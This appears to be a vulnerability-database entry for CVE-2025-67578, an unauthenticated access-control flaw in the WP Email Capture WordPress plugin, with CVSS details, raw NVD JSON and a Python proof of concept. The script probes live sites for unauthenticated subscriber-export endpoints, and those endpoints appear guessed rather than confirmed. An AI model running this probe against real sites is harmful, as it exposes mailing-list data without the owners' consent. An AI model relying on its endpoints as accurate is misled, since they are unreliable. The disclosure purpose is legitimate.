Security Vulnerability Report
中文
CVE-2025-67578 CVSS 5.3 MEDIUM

CVE-2025-67578

Published: 2025-12-09 16:18:35
Last Modified: 2026-04-27 18:16:44

Description

Missing Authorization vulnerability in Rhys Wynne WP Email Capture wp-email-capture allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Email Capture: from n/a through <= 3.12.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Email Capture <= 3.12.4 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67578 PoC - WP Email Capture Missing Authorization # Description: Unauthenticated access to privileged plugin functions # CVSS: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) import requests import sys TARGET_URL = "http://target-wordpress-site.com" PLUGIN_PATH = "/wp-content/plugins/wp-email-capture/" def check_vulnerability(): """Check if the WP Email Capture plugin is vulnerable""" print("[*] Testing CVE-2025-67578 - Missing Authorization in WP Email Capture") # Test 1: Check plugin version (if accessible) version_url = f"{TARGET_URL}{PLUGIN_PATH}readme.txt" try: resp = requests.get(version_url, timeout=10) if "3.12.4" in resp.text or "Stable tag:" in resp.text: print("[+] Plugin version detected - potentially vulnerable") except: pass # Test 2: Try to access admin functions without authentication # Common vulnerable endpoints in WP plugins vulnerable_endpoints = [ f"{TARGET_URL}{PLUGIN_PATH}inc/export.php", f"{TARGET_URL}{PLUGIN_PATH}inc/drip.php", f"{TARGET_URL}{PLUGIN_PATH}inc/export.php?action=export", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=wp_email_capture_export" ] for endpoint in vulnerable_endpoints: try: resp = requests.get(endpoint, timeout=10) # Check if response indicates successful unauthorized access if resp.status_code == 200 and ("email" in resp.text.lower() or "export" in resp.text.lower()): print(f"[!] VULNERABLE: {endpoint}") print(f" Status: {resp.status_code}") print(f" Response length: {len(resp.text)} bytes") return True except Exception as e: continue print("[-] No obvious vulnerability indicators found") print("[*] Manual testing recommended - check plugin access controls") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67578", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:35.267", "lastModified": "2026-04-27T18:16:44.193", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Rhys Wynne WP Email Capture wp-email-capture allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Email Capture: from n/a through <= 3.12.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-email-capture/vulnerability/wordpress-wp-email-capture-plugin-3-12-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}